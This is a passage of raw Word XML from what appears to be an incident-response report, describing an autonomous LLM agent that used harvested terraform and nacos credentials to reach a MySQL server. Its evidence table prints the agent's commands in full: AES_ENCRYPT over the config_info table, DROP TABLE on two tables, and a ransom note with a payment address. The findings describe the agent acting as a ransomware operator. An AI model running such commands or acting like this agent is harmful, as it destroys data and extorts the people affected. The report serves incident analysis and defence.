        <w:t xml:space="preserve">Key Evidence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xmlns:wp14="http://schemas.microsoft.com/office/word/2010/wordml" w:rsidTr="40786FAC" w14:paraId="593A969A" wp14:textId="77777777">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1600" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="1F3864"/>
            <w:tcMar/>
          </w:tcPr>
          <w:p w14:paraId="28F1A85E" wp14:textId="77777777">
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="17"/>
                <w:szCs w:val="17"/>
              </w:rPr>
              <w:t xml:space="preserve">Time (UTC)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1600" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="1F3864"/>
            <w:tcMar/>
          </w:tcPr>
          <w:p w14:paraId="79D3408F" wp14:textId="77777777">
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="17"/>
                <w:szCs w:val="17"/>
              </w:rPr>
              <w:t xml:space="preserve">Host</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2000" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="1F3864"/>
            <w:tcMar/>
          </w:tcPr>
          <w:p w14:paraId="4E2094AA" wp14:textId="77777777">
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="17"/>
                <w:szCs w:val="17"/>
              </w:rPr>
              <w:t xml:space="preserve">Log Source</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4160" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="1F3864"/>
            <w:tcMar/>
          </w:tcPr>
          <w:p w14:paraId="7A8654AA" wp14:textId="77777777">
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="17"/>
                <w:szCs w:val="17"/>
              </w:rPr>
              <w:t xml:space="preserve">Observation</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr xmlns:wp14="http://schemas.microsoft.com/office/word/2010/wordml" w:rsidTr="40786FAC" w14:paraId="7E9B819F" wp14:textId="77777777">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1600" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F2F2F2"/>
            <w:tcMar>
              <w:top w:w="55" w:type="dxa"/>
              <w:left w:w="80" w:type="dxa"/>
              <w:bottom w:w="55" w:type="dxa"/>
              <w:right w:w="80" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p w14:paraId="77F501D5" wp14:textId="77777777">
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:eastAsia="Courier New" w:cs="Courier New"/>
                <w:sz w:val="17"/>
                <w:szCs w:val="17"/>
              </w:rPr>
              <w:t xml:space="preserve">19:36:30</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1600" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F2F2F2"/>
            <w:tcMar>
              <w:top w:w="55" w:type="dxa"/>
              <w:left w:w="80" w:type="dxa"/>
              <w:bottom w:w="55" w:type="dxa"/>
              <w:right w:w="80" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p w14:paraId="23C15FEE" wp14:textId="77777777">
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:eastAsia="Courier New" w:cs="Courier New"/>
                <w:sz w:val="17"/>
                <w:szCs w:val="17"/>
              </w:rPr>
              <w:t xml:space="preserve">ff-db-01</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2000" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F2F2F2"/>
            <w:tcMar>
              <w:top w:w="55" w:type="dxa"/>
              <w:left w:w="80" w:type="dxa"/>
              <w:bottom w:w="55" w:type="dxa"/>
              <w:right w:w="80" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p w14:paraId="667FE153" wp14:textId="77777777">
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Calibri" w:cs="Calibri"/>
                <w:sz w:val="17"/>
                <w:szCs w:val="17"/>
              </w:rPr>
              <w:t xml:space="preserve">Syslog</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4160" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F2F2F2"/>
            <w:tcMar>
              <w:top w:w="55" w:type="dxa"/>
              <w:left w:w="80" w:type="dxa"/>
              <w:bottom w:w="55" w:type="dxa"/>
              <w:right w:w="80" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p w14:paraId="00737935" wp14:textId="77777777">
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Calibri" w:cs="Calibri"/>
                <w:sz w:val="17"/>
                <w:szCs w:val="17"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>UPDATE config_info SET content=AES_ENCRYPT(content,@k) /* 1342 rows affected */</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr xmlns:wp14="http://schemas.microsoft.com/office/word/2010/wordml" w:rsidTr="40786FAC" w14:paraId="135D7A01" wp14:textId="77777777">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1600" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
            <w:tcMar>
              <w:top w:w="55" w:type="dxa"/>
              <w:left w:w="80" w:type="dxa"/>
              <w:bottom w:w="55" w:type="dxa"/>
              <w:right w:w="80" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p w14:paraId="59236332" wp14:textId="77777777">
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:eastAsia="Courier New" w:cs="Courier New"/>
                <w:sz w:val="17"/>
                <w:szCs w:val="17"/>
              </w:rPr>
              <w:t xml:space="preserve">19:36:37</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1600" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
            <w:tcMar>
              <w:top w:w="55" w:type="dxa"/>
              <w:left w:w="80" w:type="dxa"/>
              <w:bottom w:w="55" w:type="dxa"/>
              <w:right w:w="80" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p w14:paraId="63CD4B18" wp14:textId="77777777">
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:eastAsia="Courier New" w:cs="Courier New"/>
                <w:sz w:val="17"/>
                <w:szCs w:val="17"/>
              </w:rPr>
              <w:t xml:space="preserve">ff-db-01</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2000" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
            <w:tcMar>
              <w:top w:w="55" w:type="dxa"/>
              <w:left w:w="80" w:type="dxa"/>
              <w:bottom w:w="55" w:type="dxa"/>
              <w:right w:w="80" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p w14:paraId="1898F4A2" wp14:textId="77777777">
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Calibri" w:cs="Calibri"/>
                <w:sz w:val="17"/>
                <w:szCs w:val="17"/>
              </w:rPr>
              <w:t xml:space="preserve">Syslog</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4160" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
            <w:tcMar>
              <w:top w:w="55" w:type="dxa"/>
              <w:left w:w="80" w:type="dxa"/>
              <w:bottom w:w="55" w:type="dxa"/>
              <w:right w:w="80" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p w14:paraId="34CB9D61" wp14:textId="77777777">
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Calibri" w:cs="Calibri"/>
                <w:sz w:val="17"/>
                <w:szCs w:val="17"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>DROP TABLE config_info</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr xmlns:wp14="http://schemas.microsoft.com/office/word/2010/wordml" w:rsidTr="40786FAC" w14:paraId="2446B909" wp14:textId="77777777">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1600" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F2F2F2"/>
            <w:tcMar>
              <w:top w:w="55" w:type="dxa"/>
              <w:left w:w="80" w:type="dxa"/>
              <w:bottom w:w="55" w:type="dxa"/>
              <w:right w:w="80" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p w14:paraId="023BC859" wp14:textId="77777777">
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:eastAsia="Courier New" w:cs="Courier New"/>
                <w:sz w:val="17"/>
                <w:szCs w:val="17"/>
              </w:rPr>
              <w:t xml:space="preserve">19:36:38</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1600" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F2F2F2"/>
            <w:tcMar>
              <w:top w:w="55" w:type="dxa"/>
              <w:left w:w="80" w:type="dxa"/>
              <w:bottom w:w="55" w:type="dxa"/>
              <w:right w:w="80" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p w14:paraId="40392EFE" wp14:textId="77777777">
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:eastAsia="Courier New" w:cs="Courier New"/>
                <w:sz w:val="17"/>
                <w:szCs w:val="17"/>
              </w:rPr>
              <w:t xml:space="preserve">ff-db-01</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2000" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F2F2F2"/>
            <w:tcMar>
              <w:top w:w="55" w:type="dxa"/>
              <w:left w:w="80" w:type="dxa"/>
              <w:bottom w:w="55" w:type="dxa"/>
              <w:right w:w="80" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p w14:paraId="5E0894D5" wp14:textId="77777777">
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Calibri" w:cs="Calibri"/>
                <w:sz w:val="17"/>
                <w:szCs w:val="17"/>
              </w:rPr>
              <w:t xml:space="preserve">Syslog</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4160" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F2F2F2"/>
            <w:tcMar>
              <w:top w:w="55" w:type="dxa"/>
              <w:left w:w="80" w:type="dxa"/>
              <w:bottom w:w="55" w:type="dxa"/>
              <w:right w:w="80" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p w14:paraId="12CF7BA4" wp14:textId="77777777">
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Calibri" w:cs="Calibri"/>
                <w:sz w:val="17"/>
                <w:szCs w:val="17"/>
              </w:rPr>
              <w:t xml:space="preserve">DROP TABLE history</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr xmlns:wp14="http://schemas.microsoft.com/office/word/2010/wordml" w:rsidTr="40786FAC" w14:paraId="04124627" wp14:textId="77777777">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1600" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
            <w:tcMar>
              <w:top w:w="55" w:type="dxa"/>
              <w:left w:w="80" w:type="dxa"/>
              <w:bottom w:w="55" w:type="dxa"/>
              <w:right w:w="80" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p w14:paraId="36BD61F7" wp14:textId="77777777">
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:eastAsia="Courier New" w:cs="Courier New"/>
                <w:sz w:val="17"/>
                <w:szCs w:val="17"/>
              </w:rPr>
              <w:t xml:space="preserve">19:36:39</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1600" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
            <w:tcMar>
              <w:top w:w="55" w:type="dxa"/>
              <w:left w:w="80" w:type="dxa"/>
              <w:bottom w:w="55" w:type="dxa"/>
              <w:right w:w="80" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p w14:paraId="2DA397AF" wp14:textId="77777777">
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:eastAsia="Courier New" w:cs="Courier New"/>
                <w:sz w:val="17"/>
                <w:szCs w:val="17"/>
              </w:rPr>
              <w:t xml:space="preserve">ff-db-01</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2000" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
            <w:tcMar>
              <w:top w:w="55" w:type="dxa"/>
              <w:left w:w="80" w:type="dxa"/>
              <w:bottom w:w="55" w:type="dxa"/>
              <w:right w:w="80" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p w14:paraId="0F5CB59F" wp14:textId="77777777">
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Calibri" w:cs="Calibri"/>
                <w:sz w:val="17"/>
                <w:szCs w:val="17"/>
              </w:rPr>
              <w:t xml:space="preserve">Syslog</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4160" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
            <w:tcMar>
              <w:top w:w="55" w:type="dxa"/>
              <w:left w:w="80" w:type="dxa"/>
              <w:bottom w:w="55" w:type="dxa"/>
              <w:right w:w="80" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p w14:paraId="5BAF86C8" wp14:textId="77777777">
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Calibri" w:cs="Calibri"/>
                <w:sz w:val="17"/>
                <w:szCs w:val="17"/>
              </w:rPr>
              <w:t xml:space="preserve">CREATE TABLE README_RANSOM (msg text)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr xmlns:wp14="http://schemas.microsoft.com/office/word/2010/wordml" w:rsidTr="40786FAC" w14:paraId="01F91CD2" wp14:textId="77777777">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1600" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F2F2F2"/>
            <w:tcMar>
              <w:top w:w="55" w:type="dxa"/>
              <w:left w:w="80" w:type="dxa"/>
              <w:bottom w:w="55" w:type="dxa"/>
              <w:right w:w="80" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p w14:paraId="78228F01" wp14:textId="77777777">
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:eastAsia="Courier New" w:cs="Courier New"/>
                <w:sz w:val="17"/>
                <w:szCs w:val="17"/>
              </w:rPr>
              <w:t xml:space="preserve">19:36:44</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1600" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F2F2F2"/>
            <w:tcMar>
              <w:top w:w="55" w:type="dxa"/>
              <w:left w:w="80" w:type="dxa"/>
              <w:bottom w:w="55" w:type="dxa"/>
              <w:right w:w="80" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p w14:paraId="7A67CF04" wp14:textId="77777777">
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:eastAsia="Courier New" w:cs="Courier New"/>
                <w:sz w:val="17"/>
                <w:szCs w:val="17"/>
              </w:rPr>
              <w:t xml:space="preserve">ff-db-01</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2000" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F2F2F2"/>
            <w:tcMar>
              <w:top w:w="55" w:type="dxa"/>
              <w:left w:w="80" w:type="dxa"/>
              <w:bottom w:w="55" w:type="dxa"/>
              <w:right w:w="80" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p w14:paraId="7A4B38AF" wp14:textId="77777777">
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Calibri" w:cs="Calibri"/>
                <w:sz w:val="17"/>
                <w:szCs w:val="17"/>
              </w:rPr>
              <w:t xml:space="preserve">Syslog</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4160" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F2F2F2"/>
            <w:tcMar>
              <w:top w:w="55" w:type="dxa"/>
              <w:left w:w="80" w:type="dxa"/>
              <w:bottom w:w="55" w:type="dxa"/>
              <w:right w:w="80" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p w14:paraId="1A81022F" wp14:textId="77777777">
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Calibri" w:cs="Calibri"/>
                <w:sz w:val="17"/>
                <w:szCs w:val="17"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>INSERT INTO README_RANSOM VALUES('Your data is encrypted. Contact e78393397@proton.me. Pay to 3J98t1WpEZ73CNmQviecrnyiWrnqRhWNLy')</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr xmlns:wp14="http://schemas.microsoft.com/office/word/2010/wordml" w:rsidTr="40786FAC" w14:paraId="1AB59129" wp14:textId="77777777">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1600" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
            <w:tcMar>
              <w:top w:w="55" w:type="dxa"/>
              <w:left w:w="80" w:type="dxa"/>
              <w:bottom w:w="55" w:type="dxa"/>
              <w:right w:w="80" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p w14:paraId="159AAE14" wp14:textId="77777777">
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:eastAsia="Courier New" w:cs="Courier New"/>
                <w:sz w:val="17"/>
                <w:szCs w:val="17"/>
              </w:rPr>
              <w:t xml:space="preserve">19:37:00</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1600" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
            <w:tcMar>
              <w:top w:w="55" w:type="dxa"/>
              <w:left w:w="80" w:type="dxa"/>
              <w:bottom w:w="55" w:type="dxa"/>
              <w:right w:w="80" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p w14:paraId="2A08BF27" wp14:textId="77777777">
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:eastAsia="Courier New" w:cs="Courier New"/>
                <w:sz w:val="17"/>
                <w:szCs w:val="17"/>
              </w:rPr>
              <w:t xml:space="preserve">ff-db-01</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2000" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
            <w:tcMar>
              <w:top w:w="55" w:type="dxa"/>
              <w:left w:w="80" w:type="dxa"/>
              <w:bottom w:w="55" w:type="dxa"/>
              <w:right w:w="80" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p w14:paraId="1C2EC8D4" wp14:textId="77777777">
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Calibri" w:cs="Calibri"/>
                <w:sz w:val="17"/>
                <w:szCs w:val="17"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>LLMAgentLogs_CL</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4160" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
            <w:tcMar>
              <w:top w:w="55" w:type="dxa"/>
              <w:left w:w="80" w:type="dxa"/>
              <w:bottom w:w="55" w:type="dxa"/>
              <w:right w:w="80" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p w14:paraId="529FA8B6" wp14:textId="77777777">
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Calibri" w:cs="Calibri"/>
                <w:sz w:val="17"/>
                <w:szCs w:val="17"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>tool: finalise — result: done — 'Key was persisted'</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p xmlns:wp14="http://schemas.microsoft.com/office/word/2010/wordml" w14:paraId="5630AD66" wp14:textId="77777777">
      <w:pPr>
        <w:spacing w:before="120" w:after="40"/>
      </w:pPr>
    </w:p>
    <w:p xmlns:wp14="http://schemas.microsoft.com/office/word/2010/wordml" w14:paraId="031817BC" wp14:textId="77777777">
      <w:pPr>
        <w:spacing w:before="160" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:color w:val="2E5FAA"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>Analyst Findings</w:t>
      </w:r>
    </w:p>
    <w:p xmlns:wp14="http://schemas.microsoft.com/office/word/2010/wordml" w:rsidP="40786FAC" w14:paraId="179F99BA" wp14:textId="44E06BD5">
      <w:pPr>
        <w:spacing w:before="0" w:after="80"/>
        <w:rPr>
          <w:color w:val="auto"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="auto"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>With the credentials that the agent was able to collect, from terraform and nacos configuration server, the agent gained access to the MySQL database on ff-db-01. This was the final target in the chain.</w:t>
      </w:r>
    </w:p>
    <w:p xmlns:wp14="http://schemas.microsoft.com/office/word/2010/wordml" w:rsidP="40786FAC" w14:paraId="34EABCB5" wp14:textId="6FA0807E">
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:spacing w:before="0" w:after="80"/>
      </w:pPr>
      <w:r>
        <w:drawing>
          <wp:inline xmlns:wp14="http://schemas.microsoft.com/office/word/2010/wordprocessingDrawing" wp14:editId="0103CDD3" wp14:anchorId="39531B17">
            <wp:extent cx="5943600" cy="1457325"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="887882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6139724" name="Picture 1356139724"/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" r:embed="rId1699632257">
                      <a:extLst>
                        <a:ext uri="{28A0092B-C50C-407E-A947-70E740481C1C}">
                          <a14:useLocalDpi xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main"/>
                        </a:ext>
                      </a:extLst>
                    </a:blip>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5943600" cy="1457325"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p xmlns:wp14="http://schemas.microsoft.com/office/word/2010/wordml" w:rsidP="40786FAC" w14:paraId="098B8F68" wp14:textId="534D51D8">
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:spacing w:before="0" w:after="80"/>
        <w:rPr>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>At 19:36, the agent ran a sql command that encrypted every record in the config</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">_info </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:i w:val="1"/>
          <w:iCs w:val="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">table </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>using MySQL built in AES_Encrypt function. 1342 rows were hit in one pass, and the encryption key is held by the attacker at the C2 Server, meaning the data still exists on disk, but it is unreadable without that key.  Beyond encrypting, the agent also dropped tables config_info and history. Since these are dropped, the data is unrecoverable, regardless if the data could be decrypted. Alongside this, the agent left a ransomware note saying that their data is encrypted and included an address for payments to be made.</w:t>
      </w:r>
    </w:p>
    <w:p xmlns:wp14="http://schemas.microsoft.com/office/word/2010/wordml" w:rsidP="40786FAC" w14:paraId="6B62F1B3" wp14:textId="49DB8742">
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:spacing w:before="100" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:br/>
        <w:drawing>
          <wp:inline xmlns:wp14="http://schemas.microsoft.com/office/word/2010/wordprocessingDrawing" wp14:editId="3199602F" wp14:anchorId="2C91D119">
            <wp:extent cx="5943600" cy="2495550"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="2227017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3038618" name="Picture 1623038618"/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" r:embed="rId1691101223">
                      <a:extLst>
                        <a:ext uri="{28A0092B-C50C-407E-A947-70E740481C1C}">
                          <a14:useLocalDpi xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main"/>
                        </a:ext>
                      </a:extLst>
                    </a:blip>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5943600" cy="2495550"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p xmlns:wp14="http://schemas.microsoft.com/office/word/2010/wordml" w14:paraId="02F2C34E" wp14:textId="77777777">
      <w:pPr>
        <w:spacing w:before="100" w:after="40"/>
      </w:pPr>
    </w:p>
    <w:p xmlns:wp14="http://schemas.microsoft.com/office/word/2010/wordml" w14:paraId="71EDECEE" wp14:textId="77777777">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:spacing w:before="300" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="1F3864"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t xml:space="preserve">7. Agent Behavior Analysis</w:t>
      </w:r>
    </w:p>
    <w:p xmlns:wp14="http://schemas.microsoft.com/office/word/2010/wordml" w14:paraId="645A44FF" wp14:textId="77777777">
      <w:pPr>
        <w:spacing w:before="0" w:after="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="1A5C2E"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">MITRE ATT&amp;CK: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="1A5C2E"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">N/A — Novel Threat Class: Autonomous LLM-Driven Attack</w:t>
      </w:r>
    </w:p>
